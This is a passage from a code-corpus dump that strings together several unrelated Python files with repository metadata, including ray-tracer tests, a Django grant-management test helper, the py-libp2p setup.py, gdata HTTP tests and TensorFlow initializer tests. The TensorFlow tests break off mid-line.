filters['code'] = args.code if args.verbose: print('Specified code path is: {}'.format(args.code)) if argsDict.get('status'): filters['status'] = args.status[0] if args.verbose: print('Specified statu is: {}'.format(args.status)) if argsDict.get('difficulty') or argsDict.get('tags'): if argsDict.get('difficulty'): filters["difficulty"] = 
args.difficulty[0] if args.verbose: print('Specified difficulty is: {}'.format(args.difficulty)) if argsDict.get('tags'): filters['tags'] = args.tags if args.verbose: print('Specified tag is: {}'.format(args.tags)) test.connect_db(db_path) test.get_problems(filters) if argsDict.get('code'): test.get_ac_question_submission(filters) test.generate_questions_submission(args.output, filters) test.generate_questions_markdown(args.output, filters) test.close_db()
41.282528
187
0.492076
795aa14b199c3b47d6aa5b76caecfc3031f3d053
1,190
py
Python
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
1
2020-05-13T20:54:01.000Z
2020-05-13T20:54:01.000Z
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
null
null
null
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
null
null
null
from raytracerchallenge_python.ray import Ray from raytracerchallenge_python.transformations import translation, scaling from raytracerchallenge_python.tuple import Point, Vector def test_creating_and_querying_a_ray(): # Given origin = Point(1, 2, 3) direction = Vector(4, 5, 6) # When r = Ray(origin, direction) # Then assert r.origin == origin assert r.direction == direction def test_computing_a_point_from_a_distance(): # Given r = Ray(Point(2, 3, 4), Vector(1, 0, 0)) # Then assert r.position(0) == Point(2, 3, 4) assert r.position(1) == Point(3, 3, 4) assert r.position(-1) == Point(1, 3, 4) assert r.position(2.5) == Point(4.5, 3, 4) def test_translating_a_ray(): # Given r = Ray(Point(1, 2, 3), Vector(0, 1, 0)) m = translation(3, 4, 5) # When r2 = r.transform(m) # Then assert r2.origin == Point(4, 6, 8) assert r2.direction == Vector(0, 1, 0) def test_scaling_a_ray(): # Given r = Ray(Point(1, 2, 3), Vector(0, 1, 0)) m = scaling(2, 3, 4) # When r2 = r.transform(m) # Then assert r2.origin == Point(2, 6, 12) assert r2.direction == Vector(0, 3, 0)
25.319149
74
0.617647
795aa153df84bd95205ccc21208432b0e1e32e27
3,890
py
Python
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
1
2021-03-04T15:24:12.000Z
2021-03-04T15:24:12.000Z
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
7
2020-08-24T13:27:02.000Z
2021-06-09T18:42:31.000Z
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
1
2021-05-20T07:40:00.000Z
2021-05-20T07:40:00.000Z
from django.urls import reverse from django.utils import timezone from rest_framework.status import HTTP_200_OK from web.grant_management.flows import GrantManagementFlow from web.grant_management.models import GrantManagementProcess class GrantManagementFlowTestHelper: DEFAULT_TASK_PAYLOADS = { 'verify_previous_applications': {'previous_applications_is_verified': True}, 'verify_event_commitment': {'event_commitment_is_verified': True}, 'verify_business_entity': {'business_entity_is_verified': True}, 'verify_state_aid': {'state_aid_is_verified': False}, 'products_and_services': { 'products_and_services_score': 5, 'products_and_services_justification': 'Blah blah blah' }, 'products_and_services_competitors': { 'products_and_services_competitors_score': 5, 'products_and_services_competitors_justification': 'Blah blah blah' }, 'export_strategy': { 'export_strategy_score': 5, 'export_strategy_justification': 'Blah blah blah' }, 'event_is_appropriate': {'event_is_appropriate': True}, 'decision': {'decision': GrantManagementProcess.Decision.APPROVED}, } def _assign_task(self, process, task): # Check task is unassigned self.assertIsNone(task.assigned) # Assign task to current logged in user self.apl_ack_assign_url = reverse( f'viewflow:grant_management:grantmanagement:{task.flow_task.name}__assign', kwargs={'process_pk': process.pk, 'task_pk': task.pk}, ) response = self.client.post(self.apl_ack_assign_url, follow=True) self.assertEqual(response.status_code, HTTP_200_OK) # Check task is assigned task.refresh_from_db() self.assertIsNotNone(task.assigned) return response, task def _complete_task(self, process, task, data=None, make_asserts=True): data = data or {} # Required as explained here https://github.com/viewflow/viewflow/issues/100 data['_viewflow_activation-started'] = timezone.now().strftime("%Y-%m-%d %H:%M") self.apl_ack_task_url = reverse( f'viewflow:grant_management:grantmanagement:{task.flow_task.name}', kwargs={'process_pk': process.pk, 'task_pk': task.pk}, ) 
response = self.client.post(self.apl_ack_task_url, data=data, follow=True) task.refresh_from_db() process.refresh_from_db() if make_asserts: if 'form' in getattr(response, 'context_data', {}): self.assertTrue( response.context_data['form'].is_valid(), msg=response.context_data['form'].errors.as_data() ) self.assertIsNotNone(task.finished) return response, task def _start_process_and_step_through_until(self, task_name='end'): """ Helper method to step through the process flow up to the provided task_name. If task_name not provided step through until end of process flow. """ # start flow ga_process = GrantManagementFlow.start.run(grant_application=self.ga) # Get next task next_task = ga_process.active_tasks().first() while next_task and next_task.flow_task.name != task_name: # Complete next task if it is a HUMAN task if next_task.flow_task_type == 'HUMAN': _, next_task = self._assign_task(ga_process, next_task) self._complete_task( ga_process, next_task, data=self.DEFAULT_TASK_PAYLOADS.get(next_task.flow_task.name) ) # Get next task next_task = ga_process.active_tasks().first() ga_process.refresh_from_db() return ga_process
39.292929
88
0.648329
795aa1ff0722ed94c27600d2294b02735525a03d
3,905
py
Python
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
315
2019-02-13T01:29:09.000Z
2022-03-28T13:44:07.000Z
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
249
2019-02-22T05:00:07.000Z
2022-03-29T16:30:46.000Z
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
77
2019-02-24T19:45:17.000Z
2022-03-30T03:20:09.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import os from setuptools import find_packages, setup extras_require = { "test": [ "pytest>=4.6.3,<5.0.0", "pytest-xdist>=1.30.0", "pytest-trio>=0.5.2", "factory-boy>=2.12.0,<3.0.0", ], "lint": [ "flake8==3.7.9", # flake8 is not semver: it has added new warnings at minor releases "isort==4.3.21", "mypy==0.780", # mypy is not semver: it has added new warnings at minor releases "mypy-protobuf==1.15", "black==19.3b0", "flake8-bugbear>=19.8.0,<20", "docformatter>=1.3.1,<2", "trio-typing~=0.5.0", ], "doc": [ "Sphinx>=2.2.1,<3", "sphinx_rtd_theme>=0.4.3,<=1", "towncrier>=19.2.0, <20", ], "dev": [ "bumpversion>=0.5.3,<1", "pytest-watch>=4.1.0,<5", "wheel", "twine", "ipython", "setuptools>=36.2.0", "tox>=3.13.2,<4.0.0", ], } extras_require["dev"] = ( extras_require["dev"] + extras_require["test"] + extras_require["lint"] + extras_require["doc"] ) fastecdsa = [ # No official fastecdsa==1.7.4,1.7.5 wheels for Windows, using a pypi package that includes # the original library, but also windows-built wheels (32+64-bit) on those versions. # Fixme: Remove section when fastecdsa has released a windows-compatible wheel # (specifically: both win32 and win_amd64 targets) # See the following issues for more information; # https://github.com/libp2p/py-libp2p/issues/363 # https://github.com/AntonKueltz/fastecdsa/issues/11 "fastecdsa-any==1.7.5;sys_platform=='win32'", # Wheels are provided for these platforms, or compiling one is minimally frustrating in a # default python installation. 
"fastecdsa==1.7.5;sys_platform!='win32'", ] with open("./README.md") as readme: long_description = readme.read() install_requires = [ "pycryptodome>=3.9.2,<4.0.0", "base58>=1.0.3,<2.0.0", "pymultihash>=0.8.2", "multiaddr>=0.0.9,<0.1.0", "rpcudp>=3.0.0,<4.0.0", "lru-dict>=1.1.6", "protobuf>=3.10.0,<4.0.0", "coincurve>=10.0.0,<11.0.0", "pynacl==1.3.0", "dataclasses>=0.7, <1;python_version<'3.7'", "async_generator==1.10", "trio>=0.15.0", "async-service>=0.1.0a6", "async-exit-stack==1.0.1", "noiseprotocol>=0.3.0,<0.4.0", ] # NOTE: Some dependencies break RTD builds. We can not install system dependencies on the # RTD system so we have to exclude these dependencies when we are in an RTD environment. readthedocs_is_building = os.environ.get("READTHEDOCS", False) if not readthedocs_is_building: install_requires.extend(fastecdsa) setup( name="libp2p", # *IMPORTANT*: Don't manually change the version here. Use `make bump`, as described in readme version="0.1.5", description="libp2p implementation written in python", long_description=long_description, long_description_content_type="text/markdown", maintainer="The Ethereum Foundation", maintainer_email="snakecharmers@ethereum.org", url="https://github.com/libp2p/py-libp2p", include_package_data=True, install_requires=install_requires, python_requires=">=3.6,<4", extras_require=extras_require, py_modules=["libp2p"], license="MIT/APACHE2.0", zip_safe=False, keywords="libp2p p2p", packages=find_packages(exclude=["tests", "tests.*"]), classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "License :: OSI Approved :: Apache Software License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", ], platforms=["unix", "linux", "osx"], )
31.747967
98
0.616389
795aa2648dcf8a74f86b25c4a1ae2f927f202bc2
795
py
Python
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
1
2018-04-17T16:48:04.000Z
2018-04-17T16:48:04.000Z
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
null
null
null
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
null
null
null
#!/usr/bin/env python import re in_one="/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/T_kin_C_matrix_full_reduced.txt" OUT_ONE=open("/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/T_kin_C_matrix_full_id_reduced.txt", 'w') MASTER_ONE=open("/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/key_T_kin_C_matrix_full_id_reduced.txt", 'w') count=1 with open(in_one, 'r') as IN: header=next(IN) OUT_ONE.write(header) for line in IN: line=line.rstrip('\n') items=re.split("[\t]",line) TE=items[0] MASTER_ONE.write(TE + '\t' + "T" + str(count) + '\n') OUT_ONE.write("T"+str(count)) for i in items[1:len(items)]: OUT_ONE.write('\t' + i) OUT_ONE.write('\n') count +=1 OUT_ONE.close() MASTER_ONE.close()
28.392857
134
0.733333
795aa4f158e93ed867a049daf24ec5d9aca3a097
6,126
py
Python
python/gdata/tests/atom_tests/http_core_test.py
vlinhd11/vlinhd11-android-scripting
c90f04eb26a3746f025a6a0beab92bb6aa88c084
[ "Apache-2.0" ]
2,293
2015-01-02T12:46:10.000Z
2022-03-29T09:45:43.000Z
python/gdata/tests/atom_tests/http_core_test.py
weiqiangzheng/sl4a
d3c17dca978cbeee545e12ea240a9dbf2a6999e9
[ "Apache-2.0" ]
315
2015-05-31T11:55:46.000Z
2022-01-12T08:36:37.000Z
python/gdata/tests/atom_tests/http_core_test.py
weiqiangzheng/sl4a
d3c17dca978cbeee545e12ea240a9dbf2a6999e9
[ "Apache-2.0" ]
1,033
2015-01-04T07:48:40.000Z
2022-03-24T09:34:37.000Z
#!/usr/bin/env python # # Copyright (C) 2009 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This module is used for version 2 of the Google Data APIs. __author__ = 'j.s@google.com (Jeff Scudder)' import unittest import atom.http_core import StringIO class UriTest(unittest.TestCase): def test_parse_uri(self): uri = atom.http_core.parse_uri('http://www.google.com/test?q=foo&z=bar') self.assert_(uri.scheme == 'http') self.assert_(uri.host == 'www.google.com') self.assert_(uri.port is None) self.assert_(uri.path == '/test') self.assert_(uri.query == {'z':'bar', 'q':'foo'}) def test_modify_request_no_request(self): uri = atom.http_core.parse_uri('http://www.google.com/test?q=foo&z=bar') request = uri.modify_request() self.assert_(request.uri.scheme == 'http') self.assert_(request.uri.host == 'www.google.com') # If no port was provided, the HttpClient is responsible for determining # the default. 
self.assert_(request.uri.port is None) self.assert_(request.uri.path.startswith('/test')) self.assertEqual(request.uri.query, {'z': 'bar', 'q': 'foo'}) self.assert_(request.method is None) self.assert_(request.headers == {}) self.assert_(request._body_parts == []) def test_modify_request_http_with_set_port(self): request = atom.http_core.HttpRequest(uri=atom.http_core.Uri(port=8080), method='POST') request.add_body_part('hello', 'text/plain') uri = atom.http_core.parse_uri('//example.com/greet') self.assert_(uri.query == {}) self.assert_(uri._get_relative_path() == '/greet') self.assert_(uri.host == 'example.com') self.assert_(uri.port is None) uri.ModifyRequest(request) self.assert_(request.uri.host == 'example.com') # If no scheme was provided, the URI will not add one, but the HttpClient # should assume the request is HTTP. self.assert_(request.uri.scheme is None) self.assert_(request.uri.port == 8080) self.assert_(request.uri.path == '/greet') self.assert_(request.method == 'POST') self.assert_(request.headers['Content-Type'] == 'text/plain') def test_modify_request_use_default_ssl_port(self): request = atom.http_core.HttpRequest( uri=atom.http_core.Uri(scheme='https'), method='PUT') request.add_body_part('hello', 'text/plain') uri = atom.http_core.parse_uri('/greet') uri.modify_request(request) self.assert_(request.uri.host is None) self.assert_(request.uri.scheme == 'https') # If no port was provided, leave the port as None, it is up to the # HttpClient to set the correct default port. 
self.assert_(request.uri.port is None) self.assert_(request.uri.path == '/greet') self.assert_(request.method == 'PUT') self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(len(request._body_parts) == 1) self.assert_(request._body_parts[0] == 'hello') def test_to_string(self): uri = atom.http_core.Uri(host='www.google.com', query={'q':'sippycode'}) uri_string = uri._to_string() self.assert_(uri_string == 'http://www.google.com/?q=sippycode') class HttpRequestTest(unittest.TestCase): def test_request_with_one_body_part(self): request = atom.http_core.HttpRequest() self.assert_(len(request._body_parts) == 0) self.assert_('Content-Length' not in request.headers) self.assert_(not 'Content-Type' in request.headers) self.assert_(not 'Content-Length' in request.headers) request.add_body_part('this is a test', 'text/plain') self.assert_(len(request._body_parts) == 1) self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(request._body_parts[0] == 'this is a test') self.assert_(request.headers['Content-Length'] == str(len( 'this is a test'))) def test_add_file_without_size(self): virtual_file = StringIO.StringIO('this is a test') request = atom.http_core.HttpRequest() try: request.add_body_part(virtual_file, 'text/plain') self.fail('We should have gotten an UnknownSize error.') except atom.http_core.UnknownSize: pass request.add_body_part(virtual_file, 'text/plain', len('this is a test')) self.assert_(len(request._body_parts) == 1) self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(request._body_parts[0].read() == 'this is a test') self.assert_(request.headers['Content-Length'] == str(len( 'this is a test'))) def test_copy(self): request = atom.http_core.HttpRequest( uri=atom.http_core.Uri(scheme='https', host='www.google.com'), method='POST', headers={'test':'1', 'ok':'yes'}) request.add_body_part('body1', 'text/plain') request.add_body_part('<html>body2</html>', 'text/html') copied = request._copy() 
self.assert_(request.uri.scheme == copied.uri.scheme) self.assert_(request.uri.host == copied.uri.host) self.assert_(request.method == copied.method) self.assert_(request.uri.path == copied.uri.path) self.assert_(request.headers == copied.headers) self.assert_(request._body_parts == copied._body_parts) copied.headers['test'] = '2' copied._body_parts[1] = '<html>body3</html>' self.assert_(request.headers != copied.headers) self.assert_(request._body_parts != copied._body_parts) def suite(): return unittest.TestSuite((unittest.makeSuite(UriTest,'test'), unittest.makeSuite(HttpRequestTest,'test'))) if __name__ == '__main__': unittest.main()
40.039216
77
0.68446
795aa67248f66e72f8f772845c4ca5b2b1b06d3d
42,643
py
Python
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
71
2017-05-25T16:02:15.000Z
2021-06-09T16:08:08.000Z
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
133
2017-04-26T16:49:49.000Z
2019-10-15T11:39:26.000Z
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
26
2017-04-12T16:25:44.000Z
2018-10-30T10:10:15.000Z
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.ops.ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import random_seed from tensorflow.python.layers import convolutional from tensorflow.python.ops import array_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import linalg_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import partitioned_variables from tensorflow.python.ops import random_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import test # Returns true iff the two initializers produce the same tensor to # within a tiny tolerance. def identicaltest(tc, init1, init2, shape=None): """Tests if two initializations are identical to within tiny tolerances. Args: tc: An instance of TensorFlowTestCase. 
init1: An Initializer that generates a tensor of a given shape init2: An Initializer that generates a tensor of a given shape shape: Shape of the tensor to initialize or `None` to use a vector of length 100. Returns: True or False as determined by test. """ if shape is None: shape = [100] with tc.test_session(graph=ops.Graph()): t1 = init1(shape).eval() with tc.test_session(graph=ops.Graph()): t2 = init2(shape).eval() return np.allclose(t1, t2, rtol=1e-15, atol=1e-15) def duplicated_initializer(tc, init, graph_seed, shape=None): """Tests duplicated random initializer within the same graph. This test generates two random kernels from the same initializer to the same graph, and checks if the results are close enough. Even given the same global, seed, two different instances of random kernels should generate different results. Args: tc: An instance of TensorFlowTestCase. init: An Initializer that generates a tensor of a given shape graph_seed: A graph-level seed to use. shape: Shape of the tensor to initialize or `None` to use a vector of length 100. Returns: True or False as determined by test. """ if shape is None: shape = [100] with tc.test_session(graph=ops.Graph()): random_seed.set_random_seed(graph_seed) t1 = init(shape).eval() t2 = init(shape).eval() return np.allclose(t1, t2, rtol=1e-15, atol=1e-15) def _init_sampler(tc, init, num): """Returns a func to generate a random tensor of shape [num]. Args: tc: An instance of TensorFlowTestCase. init: An Initializer that generates a tensor of a given shape num: Size of 1D tensor to create. Returns: Function to generate a random tensor. 
""" def func(): with tc.test_session(use_gpu=True): return init([num]).eval() return func class ConstantInitializersTest(test.TestCase): def testZerosInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.zeros_initializer()) x.initializer.run() self.assertAllEqual(x.eval(), np.zeros(shape)) def testOnesInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.ones_initializer()) x.initializer.run() self.assertAllEqual(x.eval(), np.ones(shape)) def testConstantZeroInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.constant_initializer(0.0)) x.initializer.run() self.assertAllEqual(x.eval(), np.zeros(shape)) def testConstantOneInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.constant_initializer(1.0)) x.initializer.run() self.assertAllEqual(x.eval(), np.ones(shape)) def testConstantIntInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, dtype=dtypes.int32, initializer=init_ops.constant_initializer(7)) x.initializer.run() self.assertEqual(x.dtype.base_dtype, dtypes.int32) self.assertAllEqual(x.eval(), 7 * np.ones(shape, dtype=np.int32)) def testConstantTupleInitializer(self): with self.test_session(use_gpu=True): shape = [3] x = variable_scope.get_variable( "x", shape=shape, dtype=dtypes.int32, initializer=init_ops.constant_initializer((10, 20, 30))) x.initializer.run() self.assertEqual(x.dtype.base_dtype, dtypes.int32) self.assertAllEqual(x.eval(), [10, 20, 30]) def _testNDimConstantInitializer(self, name, value, shape, expected): with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) x = 
variable_scope.get_variable(name, shape=shape, initializer=init) x.initializer.run() actual = array_ops.reshape(x, [-1]).eval() self.assertEqual(len(actual), len(expected)) for a, e in zip(actual, expected): self.assertEqual(a, e) def testNDimConstantInitializer(self): value = [0, 1, 2, 3, 4, 5] shape = [2, 3] expected = list(value) self._testNDimConstantInitializer("list", value, shape, expected) self._testNDimConstantInitializer("ndarray", np.asarray(value), shape, expected) self._testNDimConstantInitializer("2D-ndarray", np.asarray(value).reshape(tuple(shape)), shape, expected) def _testNDimConstantInitializerLessValues(self, name, value, shape, expected): with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) x = variable_scope.get_variable(name, shape=shape, initializer=init) x.initializer.run() actual = array_ops.reshape(x, [-1]).eval() self.assertGreater(len(actual), len(expected)) for i in xrange(len(actual)): a = actual[i] e = expected[i] if i < len(expected) else expected[-1] self.assertEqual(a, e) def testNDimConstantInitializerLessValues(self): value = [0, 1, 2, 3, 4, 5] shape = [2, 4] expected = list(value) self._testNDimConstantInitializerLessValues("list", value, shape, expected) self._testNDimConstantInitializerLessValues("ndarray", np.asarray(value), shape, expected) self._testNDimConstantInitializerLessValues( "2D-ndarray", np.asarray(value).reshape(tuple([2, 3])), shape, expected) def _testNDimConstantInitializerMoreValues(self, value, shape): ops.reset_default_graph() with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) self.assertRaises( ValueError, variable_scope.get_variable, "x", shape=shape, initializer=init) def testNDimConstantInitializerMoreValues(self): value = [0, 1, 2, 3, 4, 5, 6, 7] shape = [2, 3] self._testNDimConstantInitializerMoreValues(value, shape) self._testNDimConstantInitializerMoreValues(np.asarray(value), shape) 
self._testNDimConstantInitializerMoreValues( np.asarray(value).reshape(tuple([2, 4])), shape) def testInvalidValueTypeForConstantInitializerCausesTypeError(self): c = constant_op.constant([1.0, 2.0, 3.0]) with self.assertRaisesRegexp( TypeError, r"Invalid type for initial value: .*Tensor.*"): init_ops.constant_initializer(c, dtype=dtypes.float32) v = variables.Variable([3.0, 2.0, 1.0]) with self.assertRaisesRegexp( TypeError, r"Invalid type for initial value: .*Variable.*"): init_ops.constant_initializer(v, dtype=dtypes.float32) class RandomNormalInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.random_normal_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.random_normal_initializer, 0.0, 1.0, dtype=dtypes.string) class TruncatedNormalInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=2, 
dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.truncated_normal_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.truncated_normal_initializer, 0.0, 1.0, dtype=dtypes.string) class RandomUniformInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64, dtypes.int64]: init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) init2 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64, dtypes.int32, dtypes.int64]: init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) init2 = init_ops.random_uniform_initializer(0, 7, seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.random_uniform_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) class UniformUnitScalingInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) init2 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) init3 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) init4 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init3, init4)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) init2 = init_ops.uniform_unit_scaling_initializer(seed=2, dtype=dtype) init3 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) 
self.assertFalse(identicaltest(self, init1, init2)) self.assertFalse(identicaltest(self, init1, init3)) self.assertFalse(identicaltest(self, init2, init3)) def testZeroSize(self): shape = [0, 2] with self.test_session(): x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.uniform_unit_scaling_initializer()) variables.global_variables_initializer().run() self.assertAllEqual(shape, x.eval().shape) def testDuplicatedInitializer(self): init = init_ops.uniform_unit_scaling_initializer() self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.uniform_unit_scaling_initializer, dtype=dtypes.string) class VarianceScalingInitializationTest(test.TestCase): def testNormalDistribution(self): shape = [100, 100] expect_mean = 0. expect_var = 1. / shape[0] init = init_ops.variance_scaling_initializer(distribution='normal') with self.test_session(use_gpu=True): x = init(shape).eval() self.assertNear(np.mean(x), expect_mean, err=1e-2) self.assertNear(np.var(x), expect_var, err=1e-2) def testUniformDistribution(self): shape = [100, 100] expect_mean = 0. expect_var = 1. / shape[0] init = init_ops.variance_scaling_initializer(distribution='uniform') with self.test_session(use_gpu=True): x = init(shape).eval() self.assertNear(np.mean(x), expect_mean, err=1e-2) self.assertNear(np.var(x), expect_var, err=1e-2) # TODO(vrv): move to sequence_ops_test? 
class RangeTest(test.TestCase): def _Range(self, start, limit, delta): with self.test_session(use_gpu=True): tf_ans = math_ops.range(start, limit, delta, name="range") self.assertEqual([len(np.arange(start, limit, delta))], tf_ans.get_shape()) return tf_ans.eval() def testBasic(self): self.assertTrue( np.array_equal(self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4]))) self.assertTrue(np.array_equal(self._Range(0, 5, 2), np.array([0, 2, 4]))) self.assertTrue(np.array_equal(self._Range(0, 6, 2), np.array([0, 2, 4]))) self.assertTrue( np.array_equal(self._Range(13, 32, 7), np.array([13, 20, 27]))) self.assertTrue( np.array_equal( self._Range(100, 500, 100), np.array([100, 200, 300, 400]))) self.assertEqual(math_ops.range(0, 5, 1).dtype, dtypes.int32) def testLimitOnly(self): with self.test_session(use_gpu=True): self.assertAllEqual(np.arange(5), math_ops.range(5).eval()) def testEmpty(self): for start in 0, 5: self.assertTrue(np.array_equal(self._Range(start, start, 1), [])) def testNonInteger(self): self.assertTrue( np.allclose(self._Range(0, 2, 0.5), np.array([0, 0.5, 1, 1.5]))) self.assertTrue(np.allclose(self._Range(0, 5, 2.5), np.array([0, 2.5]))) self.assertTrue( np.allclose(self._Range(0, 3, 0.9), np.array([0, 0.9, 1.8, 2.7]))) self.assertTrue( np.allclose( self._Range(100., 500., 100.), np.array([100, 200, 300, 400]))) self.assertEqual(math_ops.range(0., 5., 1.).dtype, dtypes.float32) def testNegativeDelta(self): self.assertTrue( np.array_equal(self._Range(5, -1, -1), np.array([5, 4, 3, 2, 1, 0]))) self.assertTrue( np.allclose(self._Range(2.5, 0, -0.5), np.array([2.5, 2, 1.5, 1, 0.5]))) self.assertTrue( np.array_equal(self._Range(-5, -10, -3), np.array([-5, -8]))) def testDType(self): zero_int32 = math_ops.cast(0, dtypes.int32) zero_int64 = math_ops.cast(0, dtypes.int64) zero_float32 = math_ops.cast(0, dtypes.float32) zero_float64 = math_ops.cast(0, dtypes.float64) self.assertEqual(math_ops.range(zero_int32, 0, 1).dtype, 